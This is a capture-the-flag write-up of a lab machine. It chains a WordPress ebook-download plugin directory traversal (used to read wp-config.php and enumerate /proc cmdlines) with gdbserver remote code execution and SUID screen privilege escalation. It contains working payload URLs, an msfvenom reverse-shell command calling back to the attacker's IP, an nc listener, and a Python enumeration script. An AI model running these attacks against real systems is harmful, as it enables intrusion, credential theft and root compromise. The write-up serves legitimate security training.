0x01 Introduction#
Target machine IP: 10.10.11.125.
Local machine IP: 10.10.16.21 (Mac M1).
0x02 Simple Information Gathering#
The fscan port scan only discovered ports 22 and 80. A full-port nmap scan additionally found port 1337 open, but at this stage it was unclear what service it belonged to (nmap's service detection does not identify it).
nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Visiting http://10.10.11.125/ leads to a WordPress site running version 5.8.1. The site references the hostname backdoor.htb (add it to /etc/hosts so it resolves), and the backend login page is http://backdoor.htb/wp-login.php.
A WPScan run produced nothing useful.
WordPress keeps its plugins under wp-content/plugins, and directory listing is enabled: visiting http://10.10.11.125/wp-content/plugins/ shows a file hello.php and a directory ebook-download. hello.php was initially suspected of being a web shell, but on inspection it is just the stock Hello Dolly sample plugin that ships with WordPress. ebook-download sits in the plugins directory and has a readable readme.txt, so it is a third-party plugin, and the readme discloses its version.
0x03 Exploiting Vulnerabilities#
Searching https://www.exploit-db.com/ for the ebook-download plugin turns up a directory traversal vulnerability: filedownload.php passes the ebookdownloadurl parameter straight to a file read without sanitising it, so ../ sequences read any file the web server user can access.
The proof of concept (PoC) is as follows:
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================
Download wp-config.php from the target:
http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
wp-config.php contains the database credentials (DB_USER / DB_PASSWORD). Reusing them against the WordPress login failed, and MySQL is not exposed externally (only 22, 80 and 1337 are open), so they lead nowhere directly.
At this point there were no further leads from the web application. After consulting a writeup, it turned out that the service on port 1337 is gdbserver, which can be exploited directly for remote code execution (RCE): gdbserver speaks the gdb remote protocol with no authentication, so anyone who can reach the port can read and write the registers and memory of the debugged process. For testing gdbserver, refer to https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver; an exploit script is available at https://www.exploit-db.com/exploits/50539.
Exploitation process:
- Download the exploit to the local machine (saved here as gdbserver_exp.py).
- Generate shellcode using msfvenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1234 PrependFork=true -o rev.bin
- Start a local listener on the port given as LPORT.
nc -lvnp 1234
- Run the exploit.
python3 gdbserver_exp.py 10.10.11.125:1337 rev.bin
Upgrade the reverse shell to a fully interactive TTY:
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
export TERM=xterm-256color
Another way to find out which services are running on the target, without any code execution, is the /proc/<pid>/cmdline file: every numeric directory under /proc is a running process, the directory name is its PID, and cmdline holds the process's argv with NUL bytes between the arguments.
Feeding ../../../../../../proc/<pid>/cmdline to the ebook-download traversal and iterating the PID with Burp Suite Intruder enumerates the command lines of all running processes. This is how port 1337 can be identified as gdbserver from the target itself rather than from a writeup.
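The scripted equivalent of the Burp iteration, as an added example that is not part of the original writeup: it requests /proc/<pid>/cmdline through the traversal for a PID range, turns the NUL-separated argv into a readable command line, and lists the processes that exist. Two assumptions are made about the plugin's response format (it echoes the requested path before the file content and appends a window.close() script; both are stripped only if present) and about six ../ being enough to reach / from the plugin directory. The sample responses in the block are constructed for an offline dry run, not real target output.

```python
# Added example (not the page's own script): enumerate processes on the
# target through the ebook-download traversal by reading /proc/<pid>/cmdline.
# ASSUMPTIONS: the plugin echoes the requested path before the file body and
# appends a window.close() script; six ../ reach / from the plugin directory.
import sys
from urllib.parse import parse_qs, urlencode, urlparse
from urllib.request import urlopen

TARGET = "http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php"
TRAILER = b"<script>window.close()</script>"


def cmdline_path(pid: int) -> str:
    """Traversal path for /proc/<pid>/cmdline relative to the plugin directory."""
    return "../../../../../../proc/%d/cmdline" % pid


def traversal_url(path: str, base: str = TARGET) -> str:
    return base + "?" + urlencode({"ebookdownloadurl": path})


def parse_cmdline(body: bytes, requested: str) -> str:
    """Turn the raw download body into a readable command line."""
    prefix = requested.encode()
    while body.startswith(prefix):        # echoed path, possibly repeated
        body = body[len(prefix):]
    if body.endswith(TRAILER):
        body = body[:-len(TRAILER)]
    # /proc/<pid>/cmdline separates argv entries with NUL bytes
    args = [a.decode("utf-8", "replace") for a in body.split(b"\x00") if a]
    return " ".join(args)


def enumerate_processes(fetch, pids):
    """fetch(url) -> bytes. Returns {pid: cmdline} for PIDs that exist."""
    found = {}
    for pid in pids:
        path = cmdline_path(pid)
        cmd = parse_cmdline(fetch(traversal_url(path)), path)
        if cmd:                           # nonexistent PIDs yield an empty body
            found[pid] = cmd
    return found


def find_listeners(procs, port: int):
    """Processes whose command line mentions the given port number."""
    return {pid: cmd for pid, cmd in procs.items() if str(port) in cmd}


def http_fetch(url: str) -> bytes:
    with urlopen(url, timeout=10) as resp:
        return resp.read()


# Constructed sample responses for an offline dry run (not real target output).
SAMPLE = {
    cmdline_path(1): cmdline_path(1).encode() * 3
        + b"/sbin/init\x00splash\x00" + TRAILER,
    cmdline_path(2): cmdline_path(2).encode() * 3 + TRAILER,   # kernel thread
    cmdline_path(842): cmdline_path(842).encode() * 3
        + b"gdbserver\x00--once\x000.0.0.0:1337\x00" + TRAILER,
    cmdline_path(890): cmdline_path(890).encode() * 3
        + b"/usr/bin/screen\x00-dmS\x00root\x00" + TRAILER,
}


def sample_fetch(url: str) -> bytes:
    """Offline stand-in for http_fetch that answers from SAMPLE."""
    path = parse_qs(urlparse(url).query)["ebookdownloadurl"][0]
    return SAMPLE.get(path, path.encode() * 3 + TRAILER)


if __name__ == "__main__":
    # With a PID limit on the command line the real target is queried;
    # without one the constructed sample is used.
    fetch = http_fetch if len(sys.argv) > 1 else sample_fetch
    last = int(sys.argv[1]) if len(sys.argv) > 1 else 1000
    for pid, cmd in sorted(enumerate_processes(fetch, range(1, last + 1)).items()):
        print("%6d  %s" % (pid, cmd))
```

Against a live target, `python3 proc_enum.py 2000` walks PIDs 1 to 2000; the 1337 listener stands out immediately, and the same output shows whether root has a detached screen session, which matters for the privilege escalation that follows.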
0x04 Privilege Escalation#
Search for SUID binaries owned by root. One of them is /usr/bin/screen, which is not SUID on a stock Ubuntu install (it is only setgid utmp), so it has been deliberately made so. The process enumeration also shows root running a detached screen session named root. Because screen executes as root, attaching to that session with -x (multi-display mode, user/session syntax) drops into a root shell:
find / -perm -4000 -type f 2>/dev/null
screen -x root/root
0x05 Conclusion#
- Learned how to combine an arbitrary file read with /proc/<pid>/cmdline enumeration to detect the services running on a target, and how a SUID screen binary can be abused to attach to root's session for privilege escalation.
References:
https://book.hacktricks.xyz/pentesting/pentesting-remote-gdbserver
https://zhuanlan.zhihu.com/p/437147174